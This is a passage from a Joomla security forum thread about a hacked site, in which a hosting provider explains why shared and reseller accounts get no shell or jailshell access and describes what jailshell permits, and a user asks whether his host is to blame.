mandville wrote:Wonder if they use jail shell ?
They show an intro-moviewith reseller accounts how to activate jail-shell or shell. In our opinion and with me many hosting companies you do not give Shell access to end users on a shared- or reseller account...Not even jail shell (we don't give shell for sure to shared or reseller accounts) Simple reason is that you cannot change in such scenario the access port (from default 22 (which is the usual port for Brute Force attacks on the Shell), create a wheelgroup user/pass (for that account), key-only logins etc etc to name a few security issues related, etc. Besides that what knowledge the average (!) user has about 'nix' command line so why creating security risks? We do offer Shell access to certain privileged users and only where we know that the webmaster has a good idea how to handle his Shell and with it the security issues

For those who will ask what is jail shell access?
Jailshell provides users a limited privilege to ssh into their own home directory and manage all the files under their cPanel user's ownership. As your account is on a shared server, for security measures, one will never be provided with"bash" (do a google for that). Jailshell will read .bashrc, .bash_profile only under your home directory. You can run most of the linux commands needed to manage your account only and have no access to other accounts in the /home - directory. You are not allowed to compile or do any server wide installations/maintenance/upgrades

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Wed Nov 10, 2010 3:40 pm

So.... does it mean that the host got a problem? Should I move out?

 

Locked

Return to “Security in Joomla! 1.5”